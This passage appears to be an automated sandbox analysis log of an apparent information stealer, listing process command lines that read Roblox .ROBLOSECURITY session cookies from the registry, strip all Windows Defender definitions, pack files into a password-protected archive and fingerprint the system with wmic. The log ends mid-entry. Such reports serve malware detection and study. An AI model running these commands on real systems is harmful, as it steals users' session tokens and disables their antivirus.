                                                                                                                                                                                                                            Imagebase:0x7ff680120000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:85
                                                                                                                                                                                                                            Start time:09:32:35
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                            Imagebase:0x7ff680120000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:86
                                                                                                                                                                                                                            Start time:09:32:35
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:87
                                                                                                                                                                                                                            Start time:09:32:35
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:88
                                                                                                                                                                                                                            Start time:09:32:36
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                            Imagebase:0x7ff680120000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:89
                                                                                                                                                                                                                            Start time:09:32:36
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:tree /A /F
                                                                                                                                                                                                                            Imagebase:0x7ff76da80000
                                                                                                                                                                                                                            File size:20'992 bytes
                                                                                                                                                                                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:90
                                                                                                                                                                                                                            Start time:09:32:36
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:91
                                                                                                                                                                                                                            Start time:09:32:36
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\getmac.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:getmac
                                                                                                                                                                                                                            Imagebase:0x7ff761430000
                                                                                                                                                                                                                            File size:90'112 bytes
                                                                                                                                                                                                                            MD5 hash:7D4B72DFF5B8E98DD1351A401E402C33
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:92
                                                                                                                                                                                                                            Start time:09:32:36
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:tasklist /FO LIST
                                                                                                                                                                                                                            Imagebase:0x7ff623ef0000
                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:93
                                                                                                                                                                                                                            Start time:09:32:36
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.cmdline"
                                                                                                                                                                                                                            Imagebase:0x7ff690b30000
                                                                                                                                                                                                                            File size:2'759'232 bytes
                                                                                                                                                                                                                            MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:94
                                                                                                                                                                                                                            Start time:09:32:37
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                            Imagebase:0x7ff680120000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:95
                                                                                                                                                                                                                            Start time:09:32:37
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:96
                                                                                                                                                                                                                            Start time:09:32:37
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                                                            Imagebase:0x7ff680120000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:97
                                                                                                                                                                                                                            Start time:09:32:37
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:98
                                                                                                                                                                                                                            Start time:09:32:37
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESF203.tmp" "c:\Users\user\AppData\Local\Temp\se3yji4z\CSC9CC35FFA2F54059AD6E143F6E3C2E84.TMP"
                                                                                                                                                                                                                            Imagebase:0x7ff7d8310000
                                                                                                                                                                                                                            File size:52'744 bytes
                                                                                                                                                                                                                            MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:99
                                                                                                                                                                                                                            Start time:09:32:38
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:tree /A /F
                                                                                                                                                                                                                            Imagebase:0x7ff76da80000
                                                                                                                                                                                                                            File size:20'992 bytes
                                                                                                                                                                                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:100
                                                                                                                                                                                                                            Start time:09:32:38
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                            Imagebase:0x7ff741d30000
                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:101
                                                                                                                                                                                                                            Start time:09:32:38
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                            Imagebase:0x7ff680120000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:102
                                                                                                                                                                                                                            Start time:09:32:38
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:103
                                                                                                                                                                                                                            Start time:09:32:38
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:tree /A /F
                                                                                                                                                                                                                            Imagebase:0x7ff76da80000
                                                                                                                                                                                                                            File size:20'992 bytes
                                                                                                                                                                                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:104
                                                                                                                                                                                                                            Start time:09:32:39
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                                                            Imagebase:0x7ff680120000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:105
                                                                                                                                                                                                                            Start time:09:32:40
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:106
                                                                                                                                                                                                                            Start time:09:32:40
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                            Imagebase:0x7ff741d30000
                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:107
                                                                                                                                                                                                                            Start time:09:32:41
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                                                                                                                                                            Imagebase:0x7ff72c490000
                                                                                                                                                                                                                            File size:468'120 bytes
                                                                                                                                                                                                                            MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:108
                                                                                                                                                                                                                            Start time:09:32:52
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" *"
                                                                                                                                                                                                                            Imagebase:0x7ff680120000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:109
                                                                                                                                                                                                                            Start time:09:32:52
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:110
                                                                                                                                                                                                                            Start time:09:32:52
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" *
                                                                                                                                                                                                                            Imagebase:0x7ff74ee70000
                                                                                                                                                                                                                            File size:630'736 bytes
                                                                                                                                                                                                                            MD5 hash:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:111
                                                                                                                                                                                                                            Start time:09:32:54
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                                                                                                                                            Imagebase:0x7ff680120000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:112
                                                                                                                                                                                                                            Start time:09:32:54
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:113
                                                                                                                                                                                                                            Start time:09:32:54
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:wmic os get Caption
                                                                                                                                                                                                                            Imagebase:0x7ff6da5b0000
                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:114
                                                                                                                                                                                                                            Start time:09:32:55
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                                                                                                                                            Imagebase:0x7ff680120000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:115
                                                                                                                                                                                                                            Start time:09:32:55
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:116
                                                                                                                                                                                                                            Start time:09:32:55
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:wmic computersystem get totalphysicalmemory
                                                                                                                                                                                                                            Imagebase:0x7ff6da5b0000
                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:117
                                                                                                                                                                                                                            Start time:09:32:56
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                            Imagebase:0x7ff680120000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:118
                                                                                                                                                                                                                            Start time:09:32:56
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:119
                                                                                                                                                                                                                            Start time:09:32:56
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                            Imagebase:0x7ff6da5b0000
                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:120
                                                                                                                                                                                                                            Start time:09:32:57
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                                                                                                                                            Imagebase:0x7ff680120000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:121
                                                                                                                                                                                                                            Start time:09:32:57
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:122
                                                                                                                                                                                                                            Start time:09:32:57
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
